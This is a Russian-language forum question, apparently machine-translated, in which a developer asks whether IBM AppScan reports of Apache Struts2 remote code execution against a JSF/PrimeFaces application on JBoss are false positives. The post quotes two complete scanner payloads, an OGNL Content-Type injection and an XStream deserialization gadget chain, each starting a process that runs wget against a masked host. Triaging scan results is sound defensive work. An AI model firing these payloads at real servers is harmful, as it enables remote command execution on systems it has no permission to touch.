Сообщается о проблеме IBM AppScan Struts2 в JSF 2.2 и Primefaces - JBOSS 7.2 EAP

Question

Недавно мы получили результат от IBM AppScan DAST, и некоторые результаты не имеют особого смысла. Первая проблема 2 High показывает, что приложение является Struts2, что неверно, поскольку это JSF 2.2, Primefaces 7.0.9, работающий на JBOSS E ASP 7.2 (JSF версии 2.3). Я даже не видел Struts в модулях / jar-файлах JBOSS.

1.Высокий - Apache Удаленное выполнение кода Struts2

Риск (и): Это можно запускать удаленные команды на веб-сервере. Обычно это означает полную компрометацию сервера и его содержимого. Исправление: обновите до последней версии Apache Struts

GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Похоже, что ответ HTTP / 1.1 200 OK, который AppScan считает уязвимостью

Нам сказали, что мы должны проверить Content-Type заголовка запроса. Я не встречал ничего подобного ни в одном из прошлых DSAT. Кто-нибудь делал что-то подобное раньше в JSF?

1.High - Apache Struts2 REST Plugin XStream Remote Code Execution

POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>

Кажется например, ответ HTTP / 1.1 200 OK, который, по мнению AppScan, является уязвимостью

Наш веб. xml содержит определенные страницы ошибок, сохранение состояния на стороне клиента

<error-page>
        <error-code>404</error-code>
        <location>/error/404.xhtml</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <exception-type>java.lang.RuntimeException</exception-type>
        <location>/error/access.xhtml</location>
    </error-page>
    <error-page>
        <location>/error/error.xhtml</location>
    </error-page>

    <context-param>
        <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
        <param-value>client</param-value>
    </context-param>

Любой, кто видел подобное выпуск из DSAT? Могут ли некоторые из них быть ложными? Ищу отзывы и некоторые идеи.

Другая проблема

• IBM AppScan - слепой SQL Внедрение (на основе времени) - JSF 2.2 и Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Java Выполнение кода десериализации - JSF 2.2 и Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Порт Внедрение команд прослушивателя - JSF 2.2 и Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Подделка межсайтовых запросов - JSF 2.2 и Primefaces - JBOSS 7.2 EAP

Ссылки CSRF, XSS и SQL Защита от инъекционных атак в JSF